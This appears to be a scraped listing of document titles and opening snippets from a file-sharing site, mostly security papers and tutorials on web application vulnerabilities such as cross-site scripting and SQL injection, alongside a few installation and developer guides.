More informationImaging License Server User Guide
IMAGING LICENSE SERVER USER GUIDE Imaging License Server User Guide PerkinElmer Viscount Centre II, University of Warwick Science Park, Millburn Hill Road, Coventry, CV4 7HS T +44 (0) 24 7669 2229 F +44
More informationPenetration from application down to OS
April 8, 2009 Penetration from application down to OS Getting OS access using IBM Websphere Application Server vulnerabilities Digitаl Security Research Group (DSecRG) Stanislav Svistunovich research@dsecrg.com
More informationChapter 22 How to send email and access other web sites
Chapter 22 How to send email and access other web sites Murach's PHP and MySQL, C22 2010, Mike Murach & Associates, Inc. Slide 1 Objectives Applied 1. Install and use the PEAR Mail package to send email
More informationBitrix Site Manager ASP.NET. Installation Guide
Bitrix Site Manager ASP.NET Installation Guide Contents Introduction... 4 Chapter 1. Checking for IIS Installation... 5 Chapter 2. Using An Archive File to Install Bitrix Site Manager ASP.NET... 7 Preliminary
More informationSECURITY TRENDS & VULNERABILITIES REVIEW 2015
SECURITY TRENDS & VULNERABILITIES REVIEW 2015 Contents 1. Introduction...3 2. Executive summary...4 3. Inputs...6 4. Statistics as of 2014. Comparative study of results obtained in 2013...7 4.1. Overall
More informationComplete Cross-site Scripting Walkthrough
Complete Cross-site Scripting Walkthrough Author : Ahmed Elhady Mohamed Email : ahmed.elhady.mohamed@gmail.com website: www.infosec4all.tk blog : www.1nfosec4all.blogspot.com/ [+] Introduction wikipedia
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationPractical Identification of SQL Injection Vulnerabilities
Practical Identification of SQL Injection Vulnerabilities Chad Dougherty Background and Motivation The class of vulnerabilities known as SQL injection continues to present an extremely high risk in the
More informationUniversal XSS via IE8s XSS Filters
Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides: http://p42.us/ie8xss/ About Us Eduardo Vela Nava aka sirdarckcat http://sirdarckcat.net http://twitter.com/sirdarckcat
More informationAutomating SQL Injection Exploits
Automating SQL Injection Exploits Mike Shema IT Underground, Berlin 2006 Overview SQL injection vulnerabilities are pretty easy to detect. The true impact of a vulnerability is measured
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationMCAFEE FOUNDSTONE FSL UPDATE
MCAFEE FOUNDSTONE FSL UPDATE 2013-FEB-25 To better protect your environment McAfee has created this FSL check update for the Foundstone Product Suite. The following is a detailed summary of the new and
More informationWhite Paper. Blindfolded SQL Injection
White Paper In the past few years, SQL Injection attacks have been on the rise. The increase in the number of Database based applications, combined with various publications that explain the problem and
More informationThe Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA
The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4
More informationAN054 SERIAL TO WI-FI (S2W) HTTPS (SSL) AND EAP SECURITY
AN054 SERIAL TO WI-FI (S2W) HTTPS (SSL) AND EAP SECURITY AT COMMANDS/CONFIGURATION EXAMPLES Table of Contents 1 PRE-REQUIREMENT... 3 2 HTTPS EXAMPLES... 4 2.1 INSTALLING APACHE SERVER... 4 2.1.1 Install
More informationSQL Injection Vulnerabilities in Desktop Applications
Vulnerabilities in Desktop Applications Derek Ditch (lead) Dylan McDonald Justin Miller Missouri University of Science & Technology Computer Science Department April 29, 2008 Vulnerabilities in Desktop
More informationNetwork Technologies
Network Technologies Glenn Strong Department of Computer Science School of Computer Science and Statistics Trinity College, Dublin January 28, 2014 What Happens When Browser Contacts Server I Top view:
More informationSwaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications
Swaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications Marco Cova, Davide Balzarotti, Viktoria Felmetsger, and Giovanni Vigna Department of Computer Science, University
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationInterspire Website Publisher Developer Documentation. Template Customization Guide
Interspire Website Publisher Developer Documentation Template Customization Guide Table of Contents Introduction... 1 Template Directory Structure... 2 The Style Guide File... 4 Blocks... 4 What are blocks?...
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationSecure Coding. Code development practice Mitigates basic vulnerabilities. Made by security experts, for non-security experts
1 Secure Coding Code development practice Mitigates basic vulnerabilities XSS SQL Injection Made by security experts, for non-security experts Mainly developers In practice, commonly used as the only measure
More informationColumbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
More informationSQL Injection for newbie
SQL Injection for newbie SQL injection is a security vulnerability that occurs in a database layer of an application. It is technique to inject SQL query/command as an input via web pages. Sometimes we
More information